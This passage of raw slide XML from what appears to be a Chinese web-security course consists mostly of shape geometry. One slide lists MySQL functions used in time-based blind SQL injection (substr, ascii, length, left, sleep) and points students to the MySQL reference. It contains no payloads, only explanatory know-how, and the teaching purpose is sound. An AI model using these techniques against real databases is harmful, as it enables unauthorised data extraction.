                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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5" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894105C1-B092-9A4A-B106-D3DDA687FD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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B7E897-88CB-EE47-9454-B13E859C5293}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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202996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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4426831-9F81-9649-8F3A-61A5528259DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1569539"/>
            <a:ext cx="9007127" cy="3608295"/>
            <a:chOff x="2270473" y="1881982"/>
            <a:chExt cx="9007127" cy="3608295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3091194" y="1881982"/>
              <a:ext cx="8186406" cy="36082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800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>时间盲注常用函数</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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	</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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substr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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a,b,c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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：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从</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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b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位置开始，截取字符串</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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a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的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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c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长度 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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count()</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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：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计算总数 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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ascii()</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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：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返回字符的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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ASCII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码 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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length()</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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：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返回字符串的长度 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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left(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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a,b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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：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从左往右截取字符串</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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a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的前</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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b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个字符 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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sleep(n)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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：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将程序挂起</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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n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秒</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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C23BC1-A326-064A-92FE-C8B0FD431769}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="5283976" flipH="1">
              <a:off x="2271267" y="3052113"/>
              <a:ext cx="379412" cy="381000"/>
              <a:chOff x="3552" y="960"/>
              <a:chExt cx="215" cy="182"/>
            </a:xfrm>
          </p:grpSpPr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CFA5EEC6-B242-C14A-B35F-5A14F89779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48" y="960"/>
                <a:ext cx="119" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 212 w 262"/>
                  <a:gd name="T1" fmla="*/ 374 h 375"/>
                  <a:gd name="T2" fmla="*/ 261 w 262"/>
                  <a:gd name="T3" fmla="*/ 316 h 375"/>
                  <a:gd name="T4" fmla="*/ 0 w 262"/>
                  <a:gd name="T5" fmla="*/ 0 h 375"/>
                  <a:gd name="T6" fmla="*/ 212 w 262"/>
                  <a:gd name="T7" fmla="*/ 374 h 37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62"/>
                  <a:gd name="T13" fmla="*/ 0 h 375"/>
                  <a:gd name="T14" fmla="*/ 262 w 262"/>
                  <a:gd name="T15" fmla="*/ 375 h 37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62" h="375">
                    <a:moveTo>
                      <a:pt x="212" y="374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="261" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="374"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="764700"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr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20FEA43C-0851-7845-A28F-CDA60BF167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52" y="960"/>
                <a:ext cx="194" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 426"/>
                  <a:gd name="T1" fmla="*/ 374 h 375"/>
                  <a:gd name="T2" fmla="*/ 425 w 426"/>
                  <a:gd name="T3" fmla="*/ 374 h 375"/>
                  <a:gd name="T4" fmla="*/ 213 w 426"/>
                  <a:gd name="T5" fmla="*/ 0 h 375"/>
                  <a:gd name="T6" fmla="*/ 0 w 426"/>
                  <a:gd name="T7" fmla="*/ 374 h 37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6"/>
                  <a:gd name="T13" fmla="*/ 0 h 375"/>
                  <a:gd name="T14" fmla="*/ 426 w 426"/>
                  <a:gd name="T15" fmla="*/ 375 h 37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6" h="375">
                    <a:moveTo>
                      <a:pt x="0" y="374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="425" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="374"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="764700"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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F5AFF8CA-A4D6-B144-9417-9387B3574222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619318" y="5288461"/>
            <a:ext cx="7471469" cy="8809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还有很多函数可以挖掘，如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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binary</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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等，同学们理解了盲注的原理后可以到</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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官网的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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去学习。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A76639A1-9444-9949-806A-97EA9F8E3A81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C567DEE5-77EF-414B-986F-101B1C50894A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF57B38E-2DEA-6147-8384-236C24D2E9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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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9" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D631CA3-6181-414B-A40A-475988D932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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F47E965E-8E1B-1E46-8E4F-3FA4E74B938F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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8660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8EA63DA-2AEA-8F40-B1AA-FE830C782EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="3602111"/>
            <a:ext cx="4401431" cy="700017"/>
            <a:chOff x="1238250" y="3349464"/>
            <a:chExt cx="4584134" cy="729075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Title 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879CBAAF-099F-B447-9374-3EB4085EF4C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670301"/>
